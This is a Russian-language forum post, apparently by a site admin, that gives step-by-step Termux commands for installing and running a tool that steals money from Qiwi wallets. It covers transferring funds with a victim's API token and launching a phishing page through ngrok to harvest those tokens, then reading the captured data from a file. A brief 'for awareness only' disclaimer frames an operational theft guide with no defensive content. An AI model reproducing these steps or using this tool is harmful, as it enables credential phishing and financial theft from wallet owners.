- 20.06.2022
- 23 849
- 218
- 36
- Награды
- 10
- Пол
- Муж.
- Автор темы
- Администратор
- Модератор
- Команда форума
-
- #1
В этой статье мы затронем тему безопасности Qiwi-кошельков, а именно, как злоумышленник может нагло стырить деньги с вашего счёта.
Но всё это исключительно в целях предостеречь вас от взлома, а не научить взламывать чужие аккаунты.
ДИСКЛЕЙМЕР:
Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо!
Установка:
Начнём с установки. Её можно произвести даже в Termux.Сначала ставим необходимые для работы пакеты:
Код:
apt update
apt install git -y
apt install python -y
apt install php -y
apt install libgnutls -y
pip install colorama
pip install SimpleQIWIДалее качаем репозиторий:
Код:
git clone https://github.com/TermuxGuide/qiwiУстановка ngrok (для фишинга):
Код:
git clone https://github.com/tchelospy/termux-ngrok
cd termux-ngrok
bash termux-ngrok.sh
cd /homeЗапуск:
Переходим в директорию и запускаем:
Код:
cd qiwi
python qiwi.pyИспользование:
В программе имеется 3 пункта для атаки:Первый пункт позволяет запустить веб-версию управления счётом через Qiwi API.
Qiwi API - Это специальный токен, который можно раздобыть в настройках своего Qiwi-кошелька.
Вводим необходимые данные для перевода в соответствующие строки и наблюдаем за успешным переводом:
Второй пункт отличается лишь способом управления:
Третий пункт - фишинг.
С помощью него можно создать фейковую страницу, чтобы узнать токен жертвы для использования первых двух пунктов.
Запускаем фишинг, а в другом терминале ngrok:
Переходим по получившейся ссылке в ngrok и видим такую шнягу:
(Если у вас не отображается ссылка на ngrok - попробуйте включить точку доступа и запустить заново)
Когда жертва введёт свои данные, они отобразятся в терминале.
Либо запускаем новую сессию и смотрим файл, в который сохраняются данные:
Код:
cd
cd qiwi_api
cd fish
cat counter.txtПоследние темы в этом разделе:
- Обход captchaV2
- Как стать специалистом по кибербезопасности «с нуля»
- Тренировочная мишень. Сравниваем ратники с NjRat
- Ddos и Dos атаки. В чём их различие и чем опасны!
- Слив трафика из Ютуб Шортс + Выводим Shorts ролики и каналы в топ
- Пособие по финансовой грамотности от А до Я
- Поднимаем Веб-скрапер на основе ИИ
- Как сделать свой Discord бот на основе Chat GPT
- Получаем BYBIT MasterCard карту для граждан РФ и Беларуси - Оплата зарубежных сервисов
- Бесплатно пользуемся нейросетью без цензуры